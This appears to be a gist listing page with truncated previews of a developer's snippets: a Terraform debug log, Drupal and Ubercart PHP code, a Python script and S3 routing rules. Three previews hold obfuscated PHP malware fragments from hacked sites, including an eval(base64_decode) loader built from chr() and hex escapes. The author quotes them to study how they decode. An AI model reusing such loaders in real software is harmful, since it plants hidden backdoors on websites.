This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
2024-10-22T16:35:32.546-0500 [INFO] Terraform version: 1.9.8 | |
2024-10-22T16:35:32.547-0500 [DEBUG] using github.com/hashicorp/go-tfe v1.58.0 | |
2024-10-22T16:35:32.547-0500 [DEBUG] using github.com/hashicorp/hcl/v2 v2.20.0 | |
2024-10-22T16:35:32.547-0500 [DEBUG] using github.com/hashicorp/terraform-svchost v0.1.1 | |
2024-10-22T16:35:32.547-0500 [DEBUG] using github.com/zclconf/go-cty v1.14.4 | |
2024-10-22T16:35:32.547-0500 [INFO] Go runtime version: go1.22.7 | |
2024-10-22T16:35:32.547-0500 [INFO] CLI args: []string{"/opt/homebrew/Cellar/tfenv/3.0.0/versions/1.9.8/terraform", "plan"} | |
2024-10-22T16:35:32.547-0500 [DEBUG] Attempting to open CLI config file: /Users/bronius/.terraformrc | |
2024-10-22T16:35:32.547-0500 [DEBUG] File doesn't exist, but doesn't need to. Ignoring. | |
2024-10-22T16:35:32.547-0500 [DEBUG] ignoring non-existing provider search directory terraform.d/plugins |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$is_delete_form = FALSE; | |
$classes = class_uses($form_state->getFormObject()); | |
foreach ($classes as $class) { | |
if ($class === 'Drupal\Core\Entity\EntityDeleteFormTrait') { | |
$is_delete_form = TRUE; | |
break; | |
} | |
} | |
if ($is_delete_form) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// The original project query_alter takes each encrypted field with a value sought out of the query | |
// Executes a query of all other fields (or none if none) | |
// Creates a MySQL temporary table and populates with decrypted fields' values | |
// Adds that temp table as a join on the original View | |
// And then executes the view, letting MySQL query against that temporary table of decrypted values. | |
// | |
// This approach expects a parallel field, field_name_md5, to contain an md5 hash of the original, | |
// decrypted value (CRUD updated with entity/node hooks or as calculated field). At query execution, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/local/bin/python | |
import json | |
import re | |
import urllib2 | |
import subprocess | |
class Issue: | |
def __init__(self, number): | |
self.number = number |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<RoutingRules> | |
<RoutingRule> | |
<Condition> | |
<KeyPrefixEquals>//</KeyPrefixEquals> | |
</Condition> | |
<Redirect> | |
<ReplaceKeyPrefixWith>/</ReplaceKeyPrefixWith> | |
</Redirect> | |
</RoutingRule> | |
</RoutingRules> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// Note this is the result of a var_dump, so you should see two lines like: | |
// string(109877) " | |
@ini_set('error_log', NULL); | |
@ini_set('log_errors', 0); | |
@ini_set('max_execution_time', 0); | |
@set_time_limit(0); | |
if(isset($_SERVER)) | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// Look at the bottom of this script. What was an eval() I've put into a var_dump() so you can see the script this contains | |
// Copy/paste this in its entirety (minus the opening ?php tag) at http://sandbox.onlinephpfunctions.com/, and you | |
// will see the resulting code without it executing anything malicious. | |
function ntjmfak($ixdtwpth, $anmcarey){$qq = ''; for($i=0; $i < strlen($ixdtwpth); $i++){$qq .= isset($anmcarey[$ixdtwpth[$i]]) ? $anmcarey[$ixdtwpth[$i]] : $ixdtwpth[$i];} | |
$rzqwohzj="base64_decode";return $rzqwohzj($qq);} | |
$efl = 'YGyrI01f7pYts80KdV1Kp83W7Kd6bUz0nULqTLqPIkzqpvJySjQHAG1Hp80KdV1KdKd6bRPqTLqPIkzqpvJySjQH'. | |
'AkM5p8057kJZSGyWAy1aIkZysKLQ9jNwjNif7pelSGyh7016IkZqSjQLCn6CjVyVCGyfd80aCjelFa0E0N0ECENCOLtssM1ne0sk'. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Found this in a post.php in a hacked WordPress site. Just wanting to see how this evaluates. | |
$sDo80i4="p".chr(114)."e".chr(103).chr(95)."\x72".chr(101)."\x70".chr(108)."a\x63\x65"; | |
$xm3MTJ="\x65v\x61".chr(108)."(\x62".chr(97).chr(115).chr(101).chr(54)."4\x5F\x64\x65c\x6Fd".chr(101)."\x28".chr(34)."\x51GVy".chr(99)."\x6d9\x79".chr(88).chr(51)."\x4a\x6c\x63\x47\x39\x79\x64".chr(71).chr(108)."\x75\x5a".chr(121)."gw".chr(75)."T\x73\x4e".chr(67).chr(107)."\x42\x70\x62m\x6c".chr(102)."\x632".chr(86)."\x30K".chr(67).chr(74).chr(107).chr(97).chr(88)."N\x77b".chr(71).chr(70).chr(53)."\x58\x32".chr(86)."\x79\x63".chr(109)."9\x79\x63yI\x73M".chr(67)."k\x37".chr(68)."\x51\x70\x41\x61\x575\x70X".chr(51)."N\x6cdC\x67ib".chr(71)."\x39".chr(110)."\x58".chr(50)."\x56y\x63m".chr(57).chr(121)."\x63".chr(121)."IsM".chr(67)."k".chr(55)."\x44Q\x70\x41".chr(97).chr(87)."\x35".chr(112)."X\x33".chr(78)."\x6c".chr(100)."\x43g\x69\x5a".chr(88)."J".chr(121)."b3".chr(74)."\x66\x62\x47".chr(57).chr(110)."\x49\x69ww\x4b\x54s\x4E\x43\x67 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* @file megaselect.module | |
* TODO: Enter file description here. | |
*/ | |
/** | |
* Implements hook_menu(). | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* Implements hook_init(). | |
*/ | |
function uc_cart_init() { | |
global $conf; | |
$conf['i18n_variables'][] = 'uc_cart_breadcrumb_text'; | |
$conf['i18n_variables'][] = 'uc_cart_help_text'; | |
$conf['i18n_variables'][] = 'uc_continue_shopping_text'; | |
// Don't cache any cart of checkout pages. |